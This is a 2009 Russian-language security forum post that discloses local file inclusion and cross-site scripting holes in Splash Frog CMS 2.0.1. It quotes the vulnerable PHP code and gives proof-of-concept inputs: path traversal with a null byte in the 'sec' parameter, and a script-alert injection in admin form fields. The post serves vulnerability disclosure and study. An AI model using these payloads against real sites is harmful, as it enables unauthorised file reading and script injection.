HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Перезагрузить страницу Энциклопедия уязвимых скриптов
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #11  
Старый 09.12.2009, 00:56
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию
Product: Splash Frog CMS
Author: http://www.twinleafstudios.net/
Version: 2.0.1

LFI

file: details.php
/*треуються права админа*/
PHP код:
function main_content() {
    if(empty($_GET['sec']))
    { header("Location: main.php"); exit; }

    if(!empty($_SESSION['SplashFrog_ViewSite'])) {
        if(($_SESSION['SplashFrog_SiteAdmin'] != '1') && (!in_array($_SESSION['SplashFrog_ViewSite'], $_SESSION['SplashFrog_SiteID'])))
        { echo '<p class="error">You do not have permission to view this site.</p>'; return; }
    }
    
    if(file_exists("section/".$_GET['sec'].".php"))
    { include_once("section/".$_GET['sec'].".php"); }
    else
    { echo '<p class="error">Unable to access the selected section.</p>'; }

PHP код:
    <?php if(function_exists(main_content)) { echo main_content(); } ?>
target: ?sec=../../../file.php%00

/*без прав админа*/
file: details.php

PHP код:
function main_submenu() {
    if(file_exists("submenu/".$_GET['sec'].".php"))
    { include_once("submenu/".$_GET['sec'].".php"); }

Вызываеться в файле:

file: /template/tmpl2.php
PHP код:
<?php if(function_exists(main_submenu)) { echo main_submenu(); } ?>
target: ?sec=../../../file.php$00

XSS

В папке /forms/ уязвим почти каждый файл.пример:

file: /forms/admin/admin.php
PHP код:
<input type="hidden" name="adminID" value="<?=$_POST['adminID'];?>" />
    <input type="hidden" name="curUsername" id="curUsername" value="<?=$_POST['username'];?>" />
    <input type="hidden" name="curEmail" id="curEmail" value="<?=$_POST['email'];?>" />
target: {POST} ?username="><script>alert('hacker');</script>
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Библиотека SladerNon Болталка 17 05.02.2007 23:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ